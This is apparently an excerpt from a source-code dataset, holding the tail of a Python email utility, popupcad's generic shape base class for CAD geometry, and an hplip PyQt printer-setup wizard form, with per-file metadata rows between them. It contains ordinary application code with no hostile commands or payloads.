obscured = obscured + "*"
return first_letter + obscured + "@" + string_split[1]
def encode(text):
"""
For printing unicode characters
"""
return text.encode('utf-8')
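# --- Quick sanity checks (added for illustration; the example.com addresses
# are placeholders, not data from the application) ---
if __name__ == "__main__":
    print(ordinal(1), ordinal(11), ordinal(22), ordinal(103))  # 1st 11th 22nd 103rd
    print(list_to_comma_delimited_string(["alice@example.com", "bob@example.com"]))
    print(get_domain("alice@example.com"))     # example.com
    print(email_obscure("alice@example.com"))  # a****@example.com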
|
gpl-3.0
| -6,869,473,597,955,327,000 | 24.256098 | 81 | 0.523671 | false |
danaukes/popupcad
|
popupcad/filetypes/genericshapebase.py
|
2
|
15733
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
from popupcad.geometry.vertex import ShapeVertex
import numpy
import qt.QtCore as qc
import qt.QtGui as qg
from dev_tools.enum import enum
import popupcad
class ShapeInvalid(Exception):
pass
class NotSimple(Exception):
pass
class GenericShapeBase(object):
display = ['construction', 'exterior', 'interiors']
editable = ['construction']
shapetypes = enum(
line='line',
polyline='polyline',
polygon='polygon',
circle='circle',
rect2point='rect2point')
deletable = []
def __init__(self,exterior,interiors,construction=False,test_shapely=False):
self.id = id(self)
self.exterior = exterior
self.interiors = interiors
self.construction = construction
# self.exterior = self.condition_loop(self.exterior)
# self.interiors = [self.condition_loop(interior) for interior in self.interiors]
self.exterior = self.remove_redundant_points(self.exterior)
self.interiors = [self.remove_redundant_points(interior) for interior in self.interiors]
def is_valid_bool(self):
try:
self.is_valid()
return True
except:
return False
def is_valid(self):
shapely = self.to_shapely(scaling = popupcad.csg_processing_scaling)
if not shapely.is_simple:
raise(NotSimple)
if not shapely.is_valid:
raise(ShapeInvalid)
@classmethod
def lastdir(cls):
return popupcad.lastshapedir
@classmethod
def setlastdir(cls, directory):
popupcad.lastshapedir = directory
def isValid(self):
notempty = self.len_exterior() > 0
return notempty
def copy_data(self, new_type, identical=True):
exterior = [vertex.copy(identical) for vertex in self.get_exterior()]
interiors = [[vertex.copy(identical) for vertex in interior]
for interior in self.get_interiors()]
new = new_type(exterior, interiors, self.is_construction())
if identical:
new.id = self.id
return new
def copy(self, identical=True):
return self.copy_data(type(self), identical)
def upgrade(self, identical=True):
exterior = [vertex.upgrade(identical) for vertex in self.get_exterior()]
interiors = [[vertex.upgrade(identical) for vertex in interior] for interior in self.get_interiors()]
new = type(self)(exterior, interiors, self.is_construction())
if identical:
new.id = self.id
return new
def get_exterior(self):
return self.exterior
def get_interiors(self):
return self.interiors
def is_construction(self):
try:
return self.construction
except AttributeError:
self.construction = False
return self.construction
def set_construction(self, test):
self.construction = test
def exteriorpoints(self, scaling=1):
return [vertex.getpos(scaling) for vertex in self.get_exterior()]
def interiorpoints(self, scaling=1):
return [[vertex.getpos(scaling) for vertex in interior]
for interior in self.get_interiors()]
def exteriorpoints_3d(self, z=0):
points = numpy.array([vertex.getpos() for vertex in self.get_exterior()])
size = list(points.shape)
size[1]+=1
points2 = numpy.zeros(size)
points2[:,:2] = points
points2[:,2] = z
return points2.tolist()
def interiorpoints_3d(self, z=0):
interiors2 = []
for interior in self.get_interiors():
points = numpy.array([vertex.getpos() for vertex in interior])
size = list(points.shape)
size[1]+=1
points2 = numpy.zeros(size)
points2[:,:2] = points
points2[:,2] = z
interiors2.append(points2.tolist())
return interiors2
def vertices(self):
vertices = self.get_exterior()[:]
[vertices.extend(interior) for interior in self.get_interiors()]
return vertices
def points(self, scaling=1):
return [vertex.getpos(scaling) for vertex in self.vertices()]
def segments_closed(self):
points = self.get_exterior()
segments = list(zip(points, points[1:] + points[:1]))
for points in self.get_interiors():
segments.extend(list(zip(points, points[1:] + points[:1])))
return segments
def segments_open(self):
points = self.get_exterior()
segments = list(zip(points[:-1], points[1:]))
for points in self.get_interiors():
segments.extend(list(zip(points[:-1], points[1:])))
return segments
def segmentpoints(self, scaling=1):
segments = self.segments()
segmentpoints = [
(point1.getpos(scaling),
point2.getpos(scaling)) for point1,
point2 in segments]
return segmentpoints
def painterpath(self):
exterior = self.exteriorpoints(scaling=popupcad.view_scaling)
interiors = self.interiorpoints(scaling=popupcad.view_scaling)
return self.gen_painterpath(exterior, interiors)
def gen_painterpath(self, exterior, interiors):
path = qg.QPainterPath()
return path
def properties(self):
from idealab_tools.propertyeditor import PropertyEditor
return PropertyEditor(self)
def addvertex_exterior(self, vertex, special=False):
self.exterior.append(vertex)
self.update_handles()
def addvertex_exterior_special(self, vertex, special=False):
if len(self.get_exterior()) > 2:
if special:
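                # Added note: compare the new vertex against every exterior edge
                # (consecutive point pairs, wrapping around) by summed squared
                # distance to both endpoints, then insert the vertex between the
                # endpoints of the closest edge so the outline stays sensible.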
a = [v.getpos() for v in self.get_exterior()]
b = list(zip(a, a[1:] + a[:1]))
c = numpy.array(b)
d = numpy.array(vertex.getpos())
e = c - d
f = e.reshape(-1, 4)
g = (f**2).sum(1)
h = g.argmin()
self.insert_exterior_vertex(h + 1, vertex)
self.update_handles()
return
self.append_exterior_vertex(vertex)
self.update_handles()
def removevertex(self, vertex):
if vertex in self.exterior:
ii = self.exterior.index(vertex)
self.exterior.pop(ii)
for interior in self.interiors:
if vertex in self.interior:
ii = interior.index(vertex)
interior.pop(ii)
self.update_handles()
def checkedge(self, edge):
import popupcad.algorithms.points as points
for pt1, pt2 in zip(edge[:-1], edge[1:]):
if points.twopointsthesame(pt1, pt2, popupcad.distinguishable_number_difference):
raise Exception
@staticmethod
def _condition_loop(loop,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None):
if len(loop)>0:
if remove_forward_redundancy:
new_loop = [loop.pop(0)]
while not not loop:
v1 = new_loop[-1]
v2 = loop.pop(0)
if test_rounded_vertices:
equal = v1.rounded_is_equal(v2,decimal_places)
else:
equal = v1.identical(v2)
if not equal:
new_loop.append(v2)
else:
new_loop = loop[:]
v1 = new_loop[0]
v2 = new_loop[-1]
if test_rounded_vertices:
equal = v1.rounded_is_equal(v2,decimal_places)
else:
equal = v1.identical(v2)
if terminate_with_start:
if not equal:
new_loop.append(v1.copy(identical=False))
if remove_loop_reduncancy:
if equal:
new_loop.pop(-1)
if round_vertices:
new_loop = [item.round(decimal_places) for item in new_loop]
return new_loop
else:
return loop
def _condition(self,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None):
        self.exterior = self._condition_loop(self.exterior,round_vertices = round_vertices, test_rounded_vertices = test_rounded_vertices, remove_forward_redundancy=remove_forward_redundancy, remove_loop_reduncancy=remove_loop_reduncancy,terminate_with_start = terminate_with_start,decimal_places = decimal_places)
        self.interiors = [self._condition_loop(interior,round_vertices = round_vertices, test_rounded_vertices = test_rounded_vertices, remove_forward_redundancy=remove_forward_redundancy, remove_loop_reduncancy=remove_loop_reduncancy,terminate_with_start = terminate_with_start,decimal_places = decimal_places) for interior in self.interiors]
@classmethod
def condition_loop(cls,loop):
return cls._condition_loop(loop)
# def condition(self):
# self.exterior = self.condition_loop(self.exterior)
# self.interiors = [self.condition_loop(interior) for interior in self.interiors]
@classmethod
def gen_from_point_lists(cls, exterior_p, interiors_p, **kwargs):
exterior = [ShapeVertex(point) for point in exterior_p]
interiors= [[ShapeVertex(point) for point in interior] for interior in interiors_p]
return cls(exterior, interiors, **kwargs)
def genInteractiveVertices(self):
try:
return self._exteriorhandles, self._interiorhandles
except AttributeError:
self.update_handles()
return self._exteriorhandles, self._interiorhandles
def update_handles(self):
try:
for handle in self._handles:
handle.harddelete()
except AttributeError:
pass
exterior = [vertex.gen_interactive() for vertex in self.get_exterior()]
interiors = [[vertex.gen_interactive() for vertex in interior] for interior in self.get_interiors()]
handles = exterior[:]
[handles.extend(interior) for interior in interiors]
self._exteriorhandles = exterior
self._interiorhandles = interiors
self._handles = handles
def len_exterior(self):
return len(self.get_exterior())
def get_handles(self):
try:
return self._handles
except AttributeError:
self.update_handles()
return self._handles
def get_exterior_handles(self):
try:
return self._exteriorhandles
except AttributeError:
self.update_handles()
return self._exteriorhandles
def triangles3(self):
return []
@staticmethod
def generateQPolygon(points):
poly = qg.QPolygonF([qc.QPointF(*(point))
for point in numpy.array(points)])
return poly
def is_equal(self, other):
if isinstance(self, type(other)):
if len(
self.get_exterior()) == len(
other.get_exterior()) and len(
self.get_interiors()) == len(
other.get_interiors()):
for point1, point2 in zip(
self.get_exterior(), other.get_exterior()):
if not point1.is_equal(point2, popupcad.distinguishable_number_difference):
return False
for interior1, interior2 in zip(
self.get_interiors(), other.get_interiors()):
if len(interior1) != len(interior2):
return False
for point1, point2 in zip(interior1, interior2):
if not point1.is_equal(point2, popupcad.distinguishable_number_difference):
return False
return True
return False
def scale(self, m):
[item.scale(m) for item in self.get_exterior()]
[item.scale(m) for interior in self.get_interiors() for item in interior]
def shift(self, dxdy):
[item.shift(dxdy) for item in self.get_exterior()]
[item.shift(dxdy) for interior in self.get_interiors()
for item in interior]
def transform(self, T):
exteriorpoints = (T.dot(numpy.array(self.exteriorpoints_3d(z=1)).T)).T[:,:2].tolist()
interiorpoints = [(T.dot(numpy.array(interior).T)).T[:,:2].tolist() for interior in self.interiorpoints_3d(z=1)]
return self.gen_from_point_lists(exteriorpoints,interiorpoints)
def constrained_shift(self, dxdy, constraintsystem):
a = [(item, dxdy) for item in self.get_exterior()]
a.extend([(item, dxdy) for interior in self.get_interiors() for item in interior])
constraintsystem.constrained_shift(a)
def flip(self):
self.exterior = self.get_exterior()[::-1]
self.interiors = [interior[::-1] for interior in self.get_interiors()]
def hollow(self):
return [self]
def fill(self):
return [self]
def insert_exterior_vertex(self, ii, vertex):
self.exterior.insert(ii, vertex)
def append_exterior_vertex(self, vertex):
self.exterior.append(vertex)
def output_dxf(self,model_space,layer = None):
csg = self.to_shapely(scaling = popupcad.csg_processing_scaling)
new = popupcad.algorithms.csg_shapely.to_generic(csg)
return new.output_dxf(model_space,layer)
def __lt__(self,other):
return self.exteriorpoints()[0]<other.exteriorpoints()[0]
def find_minimal_enclosing_circle(self):
from popupcad.algorithms.minimal_enclosing_circle import numerical_stable_circle
return numerical_stable_circle(self.exteriorpoints)
#Gets the center
def get_center(self):
'''Retrieves the center point of the shape'''
points = self.exteriorpoints()
x_values = [point[0]/popupcad.SI_length_scaling for point in points]
y_values = [point[1]/popupcad.SI_length_scaling for point in points]
x = float(sum(x_values)) / len(x_values)
y = float(sum(y_values)) / len(y_values)
return (x, y)
def exterior_points_from_center(self):
'''Retrieves the exterior points relative to the center'''
center = self.get_center()
points = self.exteriorpoints()
x_values = [point[0]/popupcad.SI_length_scaling - center[0] for point in points]
y_values = [point[1]/popupcad.SI_length_scaling - center[1] for point in points]
return list(zip(x_values, y_values))
@classmethod
def remove_redundant_points(cls, points, scaling=1,loop_test = True):
newpoints = []
if len(points)>0:
points = points[:]
newpoints.append(points.pop(0))
while not not points:
newpoint = points.pop(0)
if not popupcad.algorithms.points.twopointsthesame(newpoints[-1].getpos(scaling),newpoint.getpos(scaling),popupcad.distinguishable_number_difference):
if len(points)==0 and loop_test:
if not popupcad.algorithms.points.twopointsthesame(newpoints[0].getpos(scaling),newpoint.getpos(scaling),popupcad.distinguishable_number_difference):
newpoints.append(newpoint)
else:
newpoints.append(newpoint)
return newpoints
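# --- Usage sketch (added for illustration; importing this module already
# requires popupcad and its Qt bindings, which is assumed rather than verified) ---
if __name__ == "__main__":
    square = GenericShapeBase.gen_from_point_lists(
        [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)], [])
    square.shift((2.0, 0.0))
    print(square.exteriorpoints())
    print(square.get_center())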
|
mit
| 9,166,630,827,800,457,000 | 35.590698 | 253 | 0.59372 | false |
matrumz/RPi_Custom_Files
|
Printing/hplip-3.15.2/ui/setupform_base.py
|
1
|
26342
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/setupform_base.ui'
#
# Created: Thu Sep 20 11:45:16 2007
# by: The PyQt User Interface Compiler (pyuic) 3.17
#
# WARNING! All changes made in this file will be lost!
from qt import *
class SetupForm_base(QWizard):
def __init__(self,parent = None,name = None,modal = 0,fl = 0):
QWizard.__init__(self,parent,name,modal,fl)
if not name:
self.setName("SetupForm_base")
self.ConnectionPage = QWidget(self,"ConnectionPage")
ConnectionPageLayout = QGridLayout(self.ConnectionPage,1,1,11,6,"ConnectionPageLayout")
self.connectionTypeButtonGroup = QButtonGroup(self.ConnectionPage,"connectionTypeButtonGroup")
self.connectionTypeButtonGroup.setColumnLayout(0,Qt.Vertical)
self.connectionTypeButtonGroup.layout().setSpacing(6)
self.connectionTypeButtonGroup.layout().setMargin(11)
connectionTypeButtonGroupLayout = QGridLayout(self.connectionTypeButtonGroup.layout())
connectionTypeButtonGroupLayout.setAlignment(Qt.AlignTop)
self.usbRadioButton = QRadioButton(self.connectionTypeButtonGroup,"usbRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.usbRadioButton,0,0)
self.netRadioButton = QRadioButton(self.connectionTypeButtonGroup,"netRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.netRadioButton,1,0)
self.parRadioButton = QRadioButton(self.connectionTypeButtonGroup,"parRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.parRadioButton,2,0)
ConnectionPageLayout.addMultiCellWidget(self.connectionTypeButtonGroup,1,1,0,1)
spacer12 = QSpacerItem(20,120,QSizePolicy.Minimum,QSizePolicy.Expanding)
ConnectionPageLayout.addItem(spacer12,2,0)
spacer18 = QSpacerItem(321,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
ConnectionPageLayout.addItem(spacer18,3,1)
self.searchFiltersPushButton2 = QPushButton(self.ConnectionPage,"searchFiltersPushButton2")
ConnectionPageLayout.addWidget(self.searchFiltersPushButton2,3,0)
self.addPage(self.ConnectionPage,QString(""))
self.ProbedDevicesPage = QWidget(self,"ProbedDevicesPage")
ProbedDevicesPageLayout = QGridLayout(self.ProbedDevicesPage,1,1,11,6,"ProbedDevicesPageLayout")
self.probedDevicesListView = QListView(self.ProbedDevicesPage,"probedDevicesListView")
self.probedDevicesListView.setAllColumnsShowFocus(1)
ProbedDevicesPageLayout.addMultiCellWidget(self.probedDevicesListView,1,1,0,3)
self.searchFiltersPushButton = QPushButton(self.ProbedDevicesPage,"searchFiltersPushButton")
ProbedDevicesPageLayout.addWidget(self.searchFiltersPushButton,2,0)
self.probeHeadingTextLabel = QLabel(self.ProbedDevicesPage,"probeHeadingTextLabel")
ProbedDevicesPageLayout.addMultiCellWidget(self.probeHeadingTextLabel,0,0,0,3)
self.manualFindPushButton = QPushButton(self.ProbedDevicesPage,"manualFindPushButton")
ProbedDevicesPageLayout.addWidget(self.manualFindPushButton,2,1)
spacer13 = QSpacerItem(101,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
ProbedDevicesPageLayout.addItem(spacer13,2,2)
self.probeUpdatePushButton = QPushButton(self.ProbedDevicesPage,"probeUpdatePushButton")
ProbedDevicesPageLayout.addWidget(self.probeUpdatePushButton,2,3)
self.addPage(self.ProbedDevicesPage,QString(""))
self.PPDPage = QWidget(self,"PPDPage")
PPDPageLayout = QGridLayout(self.PPDPage,1,1,11,6,"PPDPageLayout")
self.ppdListView = QListView(self.PPDPage,"ppdListView")
self.ppdListView.addColumn(self.__tr("PPD File"))
self.ppdListView.addColumn(self.__tr("Description"))
self.ppdListView.setAllColumnsShowFocus(1)
PPDPageLayout.addMultiCellWidget(self.ppdListView,1,1,0,2)
self.otherPPDPushButton = QPushButton(self.PPDPage,"otherPPDPushButton")
self.otherPPDPushButton.setEnabled(1)
PPDPageLayout.addWidget(self.otherPPDPushButton,2,0)
spacer9 = QSpacerItem(320,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
PPDPageLayout.addItem(spacer9,2,1)
self.ppdDefaultsPushButton = QPushButton(self.PPDPage,"ppdDefaultsPushButton")
PPDPageLayout.addWidget(self.ppdDefaultsPushButton,2,2)
self.textLabel1_5 = QLabel(self.PPDPage,"textLabel1_5")
self.textLabel1_5.setAlignment(QLabel.WordBreak | QLabel.AlignVCenter)
PPDPageLayout.addMultiCellWidget(self.textLabel1_5,0,0,0,2)
self.addPage(self.PPDPage,QString(""))
self.PrinterNamePage = QWidget(self,"PrinterNamePage")
PrinterNamePageLayout = QGridLayout(self.PrinterNamePage,1,1,11,6,"PrinterNamePageLayout")
self.groupBox4 = QGroupBox(self.PrinterNamePage,"groupBox4")
self.groupBox4.setColumnLayout(0,Qt.Vertical)
self.groupBox4.layout().setSpacing(6)
self.groupBox4.layout().setMargin(11)
groupBox4Layout = QGridLayout(self.groupBox4.layout())
groupBox4Layout.setAlignment(Qt.AlignTop)
self.printerNameLineEdit = QLineEdit(self.groupBox4,"printerNameLineEdit")
self.printerNameLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerNameLineEdit,0,1)
self.defaultPrinterNamePushButton = QPushButton(self.groupBox4,"defaultPrinterNamePushButton")
self.defaultPrinterNamePushButton.setEnabled(0)
groupBox4Layout.addWidget(self.defaultPrinterNamePushButton,0,2)
self.textLabel1_2 = QLabel(self.groupBox4,"textLabel1_2")
groupBox4Layout.addWidget(self.textLabel1_2,1,0)
self.textLabel1 = QLabel(self.groupBox4,"textLabel1")
groupBox4Layout.addWidget(self.textLabel1,0,0)
self.printerDescriptionLineEdit = QLineEdit(self.groupBox4,"printerDescriptionLineEdit")
self.printerDescriptionLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerDescriptionLineEdit,2,1)
self.printerLocationLineEdit = QLineEdit(self.groupBox4,"printerLocationLineEdit")
self.printerLocationLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerLocationLineEdit,1,1)
self.textLabel2 = QLabel(self.groupBox4,"textLabel2")
groupBox4Layout.addWidget(self.textLabel2,2,0)
PrinterNamePageLayout.addWidget(self.groupBox4,0,0)
self.faxInfoGroupBox = QGroupBox(self.PrinterNamePage,"faxInfoGroupBox")
self.faxInfoGroupBox.setColumnLayout(0,Qt.Vertical)
self.faxInfoGroupBox.layout().setSpacing(6)
self.faxInfoGroupBox.layout().setMargin(11)
faxInfoGroupBoxLayout = QGridLayout(self.faxInfoGroupBox.layout())
faxInfoGroupBoxLayout.setAlignment(Qt.AlignTop)
self.faxNameLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNameLineEdit")
faxInfoGroupBoxLayout.addWidget(self.faxNameLineEdit,1,1)
self.textLabel1_3 = QLabel(self.faxInfoGroupBox,"textLabel1_3")
faxInfoGroupBoxLayout.addWidget(self.textLabel1_3,1,0)
self.textLabel3 = QLabel(self.faxInfoGroupBox,"textLabel3")
faxInfoGroupBoxLayout.addWidget(self.textLabel3,3,0)
self.textLabel2_2 = QLabel(self.faxInfoGroupBox,"textLabel2_2")
faxInfoGroupBoxLayout.addWidget(self.textLabel2_2,2,0)
self.faxCheckBox = QCheckBox(self.faxInfoGroupBox,"faxCheckBox")
self.faxCheckBox.setChecked(1)
faxInfoGroupBoxLayout.addMultiCellWidget(self.faxCheckBox,0,0,0,2)
self.faxNumberLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNumberLineEdit")
self.faxNumberLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxNumberLineEdit,2,1)
self.faxNameCoLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNameCoLineEdit")
self.faxNameCoLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxNameCoLineEdit,3,1)
self.defaultFaxNamePushButton = QPushButton(self.faxInfoGroupBox,"defaultFaxNamePushButton")
self.defaultFaxNamePushButton.setEnabled(0)
faxInfoGroupBoxLayout.addWidget(self.defaultFaxNamePushButton,1,2)
self.textLabel1_2_2 = QLabel(self.faxInfoGroupBox,"textLabel1_2_2")
faxInfoGroupBoxLayout.addWidget(self.textLabel1_2_2,4,0)
self.textLabel2_4 = QLabel(self.faxInfoGroupBox,"textLabel2_4")
faxInfoGroupBoxLayout.addWidget(self.textLabel2_4,5,0)
self.faxLocationLineEdit = QLineEdit(self.faxInfoGroupBox,"faxLocationLineEdit")
self.faxLocationLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxLocationLineEdit,4,1)
self.faxDescriptionLineEdit = QLineEdit(self.faxInfoGroupBox,"faxDescriptionLineEdit")
self.faxDescriptionLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxDescriptionLineEdit,5,1)
PrinterNamePageLayout.addWidget(self.faxInfoGroupBox,1,0)
self.textLabel1_4 = QLabel(self.PrinterNamePage,"textLabel1_4")
PrinterNamePageLayout.addWidget(self.textLabel1_4,3,0)
spacer14 = QSpacerItem(20,20,QSizePolicy.Minimum,QSizePolicy.Expanding)
PrinterNamePageLayout.addItem(spacer14,2,0)
self.addPage(self.PrinterNamePage,QString(""))
self.FinishedPage = QWidget(self,"FinishedPage")
FinishedPageLayout = QGridLayout(self.FinishedPage,1,1,11,6,"FinishedPageLayout")
self.printTestPageCheckBox = QCheckBox(self.FinishedPage,"printTestPageCheckBox")
self.printTestPageCheckBox.setChecked(1)
FinishedPageLayout.addWidget(self.printTestPageCheckBox,4,0)
spacer7 = QSpacerItem(20,20,QSizePolicy.Minimum,QSizePolicy.Expanding)
FinishedPageLayout.addItem(spacer7,3,0)
self.faxGroupBox = QGroupBox(self.FinishedPage,"faxGroupBox")
self.faxGroupBox.setEnabled(0)
self.faxGroupBox.setColumnLayout(0,Qt.Vertical)
self.faxGroupBox.layout().setSpacing(6)
self.faxGroupBox.layout().setMargin(11)
faxGroupBoxLayout = QGridLayout(self.faxGroupBox.layout())
faxGroupBoxLayout.setAlignment(Qt.AlignTop)
self.textLabel7 = QLabel(self.faxGroupBox,"textLabel7")
faxGroupBoxLayout.addWidget(self.textLabel7,0,0)
self.lineEdit5 = QLineEdit(self.faxGroupBox,"lineEdit5")
self.lineEdit5.setFrameShape(QLineEdit.NoFrame)
self.lineEdit5.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit5,0,1)
self.lineEdit6 = QLineEdit(self.faxGroupBox,"lineEdit6")
self.lineEdit6.setFrameShape(QLineEdit.NoFrame)
self.lineEdit6.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit6,1,1)
self.textLabel6 = QLabel(self.faxGroupBox,"textLabel6")
faxGroupBoxLayout.addWidget(self.textLabel6,1,0)
self.textLabel8 = QLabel(self.faxGroupBox,"textLabel8")
faxGroupBoxLayout.addWidget(self.textLabel8,2,0)
self.textLabel8_2 = QLabel(self.faxGroupBox,"textLabel8_2")
faxGroupBoxLayout.addWidget(self.textLabel8_2,3,0)
self.lineEdit7 = QLineEdit(self.faxGroupBox,"lineEdit7")
self.lineEdit7.setFrameShape(QLineEdit.NoFrame)
self.lineEdit7.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit7,2,1)
self.textLabel8_3 = QLabel(self.faxGroupBox,"textLabel8_3")
faxGroupBoxLayout.addWidget(self.textLabel8_3,4,0)
self.lineEdit8 = QLineEdit(self.faxGroupBox,"lineEdit8")
self.lineEdit8.setFrameShape(QLineEdit.NoFrame)
self.lineEdit8.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit8,3,1)
self.lineEdit9 = QLineEdit(self.faxGroupBox,"lineEdit9")
self.lineEdit9.setFrameShape(QLineEdit.NoFrame)
self.lineEdit9.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit9,4,1)
FinishedPageLayout.addWidget(self.faxGroupBox,2,0)
self.groupBox3 = QGroupBox(self.FinishedPage,"groupBox3")
self.groupBox3.setColumnLayout(0,Qt.Vertical)
self.groupBox3.layout().setSpacing(6)
self.groupBox3.layout().setMargin(11)
groupBox3Layout = QGridLayout(self.groupBox3.layout())
groupBox3Layout.setAlignment(Qt.AlignTop)
self.textLabel4 = QLabel(self.groupBox3,"textLabel4")
groupBox3Layout.addWidget(self.textLabel4,2,0)
self.textLabel3_2 = QLabel(self.groupBox3,"textLabel3_2")
groupBox3Layout.addWidget(self.textLabel3_2,1,0)
self.lineEdit4 = QLineEdit(self.groupBox3,"lineEdit4")
self.lineEdit4.setFrameShape(QLineEdit.NoFrame)
self.lineEdit4.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit4,3,1)
self.textLabel2_3 = QLabel(self.groupBox3,"textLabel2_3")
groupBox3Layout.addWidget(self.textLabel2_3,0,0)
self.lineEdit3 = QLineEdit(self.groupBox3,"lineEdit3")
self.lineEdit3.setFrameShape(QLineEdit.NoFrame)
self.lineEdit3.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit3,2,1)
self.lineEdit2 = QLineEdit(self.groupBox3,"lineEdit2")
self.lineEdit2.setFrameShape(QLineEdit.NoFrame)
self.lineEdit2.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit2,1,1)
self.lineEdit1 = QLineEdit(self.groupBox3,"lineEdit1")
self.lineEdit1.setFrameShape(QLineEdit.NoFrame)
self.lineEdit1.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit1,0,1)
self.textLabel5 = QLabel(self.groupBox3,"textLabel5")
groupBox3Layout.addWidget(self.textLabel5,3,0)
FinishedPageLayout.addWidget(self.groupBox3,1,0)
self.textLabel2_5 = QLabel(self.FinishedPage,"textLabel2_5")
self.textLabel2_5.setAlignment(QLabel.WordBreak | QLabel.AlignVCenter)
FinishedPageLayout.addWidget(self.textLabel2_5,0,0)
self.addPage(self.FinishedPage,QString(""))
self.languageChange()
self.resize(QSize(754,456).expandedTo(self.minimumSizeHint()))
self.clearWState(Qt.WState_Polished)
self.connect(self.connectionTypeButtonGroup,SIGNAL("clicked(int)"),self.connectionTypeButtonGroup_clicked)
self.connect(self.probedDevicesListView,SIGNAL("currentChanged(QListViewItem*)"),self.probedDevicesListView_currentChanged)
self.connect(self.printerNameLineEdit,SIGNAL("textChanged(const QString&)"),self.printerNameLineEdit_textChanged)
self.connect(self.defaultPrinterNamePushButton,SIGNAL("clicked()"),self.defaultPrinterNamePushButton_clicked)
self.connect(self.ppdListView,SIGNAL("currentChanged(QListViewItem*)"),self.ppdListView_currentChanged)
self.connect(self.searchFiltersPushButton,SIGNAL("clicked()"),self.searchFiltersPushButton_clicked)
self.connect(self.searchFiltersPushButton2,SIGNAL("clicked()"),self.searchFiltersPushButton2_clicked)
self.connect(self.probeUpdatePushButton,SIGNAL("clicked()"),self.probeUpdatePushButton_clicked)
self.connect(self.manualFindPushButton,SIGNAL("clicked()"),self.manualFindPushButton_clicked)
self.connect(self.printerLocationLineEdit,SIGNAL("textChanged(const QString&)"),self.printerLocationLineEdit_textChanged)
self.connect(self.printerDescriptionLineEdit,SIGNAL("textChanged(const QString&)"),self.printerDescriptionLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNameLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNumberLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNameCoLineEdit.setEnabled)
self.connect(self.faxNameLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNameLineEdit_textChanged)
self.connect(self.faxNumberLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNumberLineEdit_textChanged)
self.connect(self.faxNameCoLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNameCoLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxCheckBox_toggled)
self.connect(self.printTestPageCheckBox,SIGNAL("toggled(bool)"),self.printTestPageCheckBox_toggled)
self.connect(self.defaultFaxNamePushButton,SIGNAL("clicked()"),self.defaultFaxNamePushButton_clicked)
self.connect(self.otherPPDPushButton,SIGNAL("clicked()"),self.otherPPDPushButton_clicked)
self.connect(self.ppdDefaultsPushButton,SIGNAL("clicked()"),self.ppdDefaultsPushButton_clicked)
self.connect(self.faxLocationLineEdit,SIGNAL("textChanged(const QString&)"),self.faxLocationLineEdit_textChanged)
self.connect(self.faxDescriptionLineEdit,SIGNAL("textChanged(const QString&)"),self.faxDescriptionLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxLocationLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxDescriptionLineEdit.setEnabled)
self.setTabOrder(self.printerNameLineEdit,self.printerLocationLineEdit)
self.setTabOrder(self.printerLocationLineEdit,self.printerDescriptionLineEdit)
self.setTabOrder(self.printerDescriptionLineEdit,self.faxCheckBox)
self.setTabOrder(self.faxCheckBox,self.faxNameLineEdit)
self.setTabOrder(self.faxNameLineEdit,self.faxNumberLineEdit)
self.setTabOrder(self.faxNumberLineEdit,self.faxNameCoLineEdit)
self.setTabOrder(self.faxNameCoLineEdit,self.faxLocationLineEdit)
self.setTabOrder(self.faxLocationLineEdit,self.faxDescriptionLineEdit)
self.setTabOrder(self.faxDescriptionLineEdit,self.usbRadioButton)
self.setTabOrder(self.usbRadioButton,self.netRadioButton)
self.setTabOrder(self.netRadioButton,self.parRadioButton)
self.setTabOrder(self.parRadioButton,self.searchFiltersPushButton2)
self.setTabOrder(self.searchFiltersPushButton2,self.probedDevicesListView)
self.setTabOrder(self.probedDevicesListView,self.searchFiltersPushButton)
self.setTabOrder(self.searchFiltersPushButton,self.manualFindPushButton)
self.setTabOrder(self.manualFindPushButton,self.probeUpdatePushButton)
self.setTabOrder(self.probeUpdatePushButton,self.ppdListView)
self.setTabOrder(self.ppdListView,self.otherPPDPushButton)
